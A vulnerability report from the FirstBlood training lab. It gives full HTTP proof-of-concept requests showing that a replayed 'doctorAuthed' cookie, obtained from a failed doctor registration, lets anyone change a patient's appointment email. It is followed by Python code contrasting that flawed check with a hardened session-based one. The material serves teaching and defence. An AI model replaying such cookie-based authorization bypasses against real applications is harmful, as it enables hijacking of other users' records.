FirstBlood #65: DoctorAuthed cookie given at /register.php can be used to modify patient email at Appointment Form /manageappointment.php
This issue was discovered on FirstBlood v1

On 2021-05-09, 0xconft Level 5 reported:

Hi there,

When I tested registering as a doctor at the /register.php endpoint with invalid data, I got my cookie set to "doctorAuthed=eyJkb2N0b3JBdXRoIjphdXRoZWR9", and I can use this cookie to modify a patient's email at the Appointment Form /manageappointment.php.

This bug can be chained with my previous report, "aptid enumeration via http://firstbloodhackers.com:49276/api/qa.php can be used to leak Appointment data".

PoC of getting the doctorAuthed cookie. Request:

POST /register.php HTTP/1.1
Host: firstbloodhackers.com:49280
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
Origin: http://firstbloodhackers.com:49280
Connection: close
Referer: http://firstbloodhackers.com:49280/register.php
Upgrade-Insecure-Requests: 1

action=register&username=duh&inviteCode=1111111

Response:

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 09 May 2021 18:58:55 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Set-Cookie: doctorAuthed=eyJkb2N0b3JBdXRoIjphdXRoZWR9; expires=Sun, 09-May-2021 19:58:55 GMT; Max-Age=3600; path=/
Content-Length: 11014

-snip-

PoC of changing Sean Zseano's email address. Request:

POST /api/ma.php HTTP/1.1
Host: firstbloodhackers.com:49280
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-SITE-REQ: permitted
csrf: 99215d4e-0ff3-4275
Content-Length: 136
Origin: http://firstbloodhackers.com:49280
Connection: close
Referer: http://firstbloodhackers.com:49280/manageappointment.php?success&aptid=15a49a94-8db6-4f64-875c-4de449d755ed
Cookie: doctorAuthed=eyJkb2N0b3JBdXRoIjphdXRoZWR9

message=Advised to rebook appointment as I missed my previous one&id=15a49a94-8db6-4f64-875c-4de449d755ed&[email protected]

Response:

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 09 May 2021 18:52:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 7

success

And zseano's email will be changed to [email protected] (screenshot attached).

Best Regards, 0xconft

P2 High

Endpoint: /manageappointment.php

Parameter: email

Payload: [email protected]


FirstBlood ID: 7
Vulnerability Type: Application/Business Logic

The endpoint /api/ma.php (used to modify an appointment) only allows certain values to be modified; however, due to an application logic error, if the user has tried to sign up as a doctor and has the cookie "doctorAuthed" set, it allows them to modify the email address for any appointment.
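The root cause described above is that the modify-appointment endpoint decides which fields may change by looking for a client-supplied cookie rather than server-side session state, and that the cookie itself is a fixed base64 string (decoding the value quoted in the report shows it carries no secret or signature). The following Python model, which is an added illustration and not FirstBlood's own code, contrasts that weak check with a hardened one: the role comes from a server-side session populated only after a completed login, the set of mutable fields is an allowlist per role, and a patient may only touch an appointment they own. The field names, the `Session` class and the per-role allowlists are assumptions made for the example.

```python
import base64
from dataclasses import dataclass
from typing import Optional, Set, Tuple, List, Dict

# Cookie value quoted in the report. It is plain base64 with no MAC or
# server-side lookup, so anyone who has seen it once can replay it.
REPORTED_COOKIE = "eyJkb2N0b3JBdXRoIjphdXRoZWR9"


def decode_cookie(value: str) -> str:
    """Base64-decode a cookie value, tolerating stripped '=' padding."""
    padded = value + "=" * (-len(value) % 4)
    return base64.b64decode(padded).decode("utf-8")


@dataclass
class Session:
    # Hypothetical server-side session record; role is set only after a
    # successful, fully validated login, never copied from a cookie.
    user_id: Optional[str] = None
    role: Optional[str] = None  # "patient" | "doctor" | None


# Hypothetical allowlists of fields that /api/ma.php may change per role.
PATIENT_FIELDS: Set[str] = {"message"}
DOCTOR_FIELDS: Set[str] = {"message", "email"}


def vulnerable_allowed_fields(cookies: Dict[str, str]) -> Set[str]:
    """Weak check: the mere presence of a client cookie grants doctor rights."""
    if "doctorAuthed" in cookies:
        return DOCTOR_FIELDS
    return PATIENT_FIELDS


def hardened_allowed_fields(session: Session) -> Set[str]:
    """Hardened check: role is read from server-side session state only."""
    if session.role == "doctor":
        return DOCTOR_FIELDS
    if session.role == "patient":
        return PATIENT_FIELDS
    return set()  # unauthenticated callers may change nothing


def may_touch_appointment(session: Session, appointment: Dict[str, str]) -> bool:
    """Object-level check: doctors may manage any appointment, patients only
    their own. Knowing an appointment id alone is not authorization."""
    if session.role == "doctor":
        return True
    return session.role == "patient" and appointment.get("owner") == session.user_id


def apply_update(appointment: Dict[str, str], params: Dict[str, str],
                 allowed: Set[str]) -> Tuple[Dict[str, str], List[str]]:
    """Copy only allowlisted parameters onto the appointment; return the
    updated record and the list of parameters that were rejected."""
    rejected = sorted(k for k in params if k not in allowed)
    updated = dict(appointment)
    for key in allowed & params.keys():
        updated[key] = params[key]
    return updated, rejected


def handle_modify(session: Session, appointment: Dict[str, str],
                  params: Dict[str, str]) -> Tuple[str, Dict[str, str], List[str]]:
    """Hardened request handler: returns (status, record, rejected_params)."""
    if not may_touch_appointment(session, appointment):
        return "forbidden", appointment, sorted(params)
    updated, rejected = apply_update(appointment, params, hardened_allowed_fields(session))
    return "success", updated, rejected


if __name__ == "__main__":
    # Constructed sample appointment and the parameters from the report's PoC.
    apt = {"id": "15a49a94-8db6-4f64-875c-4de449d755ed",
           "owner": "patient-zseano", "email": "original@example.invalid"}
    params = {"message": "Advised to rebook appointment", "email": "attacker@example.invalid"}
    print("cookie decodes to:", decode_cookie(REPORTED_COOKIE))
    print("weak check grants:", vulnerable_allowed_fields({"doctorAuthed": REPORTED_COOKIE}))
    print("hardened, cookie only:", handle_modify(Session(), apt, params))
    print("hardened, real doctor:", handle_modify(Session("dr-1", "doctor"), apt, params))
```

In the hardened path a request carrying only the replayed cookie has no session role, so it is refused outright, and a logged-in patient editing their own appointment has the `email` parameter dropped and reported rather than applied. Logging the `rejected` list is also a cheap detection signal: repeated attempts to set `email` without a doctor session stand out.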